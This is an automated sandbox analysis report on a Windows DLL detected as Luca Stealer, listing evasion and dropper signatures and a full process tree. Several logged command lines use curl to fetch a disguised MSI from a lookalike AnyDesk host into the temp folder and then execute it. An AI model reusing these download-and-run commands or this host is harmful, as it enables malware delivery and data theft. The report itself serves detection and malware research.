Windows
Analysis Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
Overview
General Information
Detection
Luca Stealer
Score | Range | Whitelisted | Confidence
---|---|---|---
52 | 0 - 100 | false | 100%
Signatures
Yara detected Luca Stealer
Queries memory information (via WMI often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Drops PE files
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll64.exe (PID: 1096, cmdline: loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll", MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
- conhost.exe (PID: 68, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 4304, cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- rundll32.exe (PID: 6056, cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1, MD5: 73C519F050C20580F8A62C849D49215A)
- cmd.exe (PID: 6020, cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6072, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- curl.exe (PID: 6088, cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi, MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
- cmd.exe (PID: 5180, cmdline: cmd /C %temp%\spclwow78x.msi, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4496, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- msiexec.exe (PID: 4792, cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi", MD5: 4767B71A318E201188A0D0A420C8B608)
- rundll32.exe (PID: 6000, cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen, MD5: 73C519F050C20580F8A62C849D49215A)
- cmd.exe (PID: 6012, cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6008, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- curl.exe (PID: 6080, cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi, MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
- cmd.exe (PID: 6096, cmdline: cmd /C %temp%\spclwow78x.msi, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6128, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- msiexec.exe (PID: 5804, cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi", MD5: 4767B71A318E201188A0D0A420C8B608)
- rundll32.exe (PID: 1668, cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen, MD5: 73C519F050C20580F8A62C849D49215A)
- cmd.exe (PID: 4696, cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4780, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- curl.exe (PID: 5272, cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi, MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
- cmd.exe (PID: 2764, cmdline: cmd /C %temp%\spclwow78x.msi, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 3020, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- msiexec.exe (PID: 1708, cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi", MD5: 4767B71A318E201188A0D0A420C8B608)
- msiexec.exe (PID: 3660, cmdline: C:\Windows\system32\msiexec.exe /V, MD5: 4767B71A318E201188A0D0A420C8B608)
- msiexec.exe (PID: 5260, cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79, MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
- icacls.exe (PID: 1400, cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH, MD5: FF0D1D4317A44C951240FAE75075D501)
- conhost.exe (PID: 5992, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- expand.exe (PID: 4272, cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, MD5: 8F8C20238C1194A428021AC62257436D)
- conhost.exe (PID: 2348, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- UIServices.exe (PID: 3560, cmdline: "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe", MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
- icacls.exe (PID: 1916, cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW, MD5: FF0D1D4317A44C951240FAE75075D501)
- conhost.exe (PID: 1772, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- msiexec.exe (PID: 5104, cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD, MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
- icacls.exe (PID: 4988, cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH, MD5: FF0D1D4317A44C951240FAE75075D501)
- conhost.exe (PID: 4964, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- expand.exe (PID: 4968, cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, MD5: 8F8C20238C1194A428021AC62257436D)
- conhost.exe (PID: 4936, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- UIServices.exe (PID: 5736, cmdline: "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe", MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
- icacls.exe (PID: 4780, cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW, MD5: FF0D1D4317A44C951240FAE75075D501)
- conhost.exe (PID: 1172, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- msiexec.exe (PID: 5396, cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9, MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
- icacls.exe (PID: 5444, cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH, MD5: FF0D1D4317A44C951240FAE75075D501)
- conhost.exe (PID: 5324, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- expand.exe (PID: 5292, cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, MD5: 8F8C20238C1194A428021AC62257436D)
- conhost.exe (PID: 3328, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- UIServices.exe (PID: 3928, cmdline: "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe", MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
- icacls.exe (PID: 2140, cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW, MD5: FF0D1D4317A44C951240FAE75075D501)
- conhost.exe (PID: 1000, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security | 
 | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security | 
 | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security | 
No Sigma rule has matched
No Snort rule has matched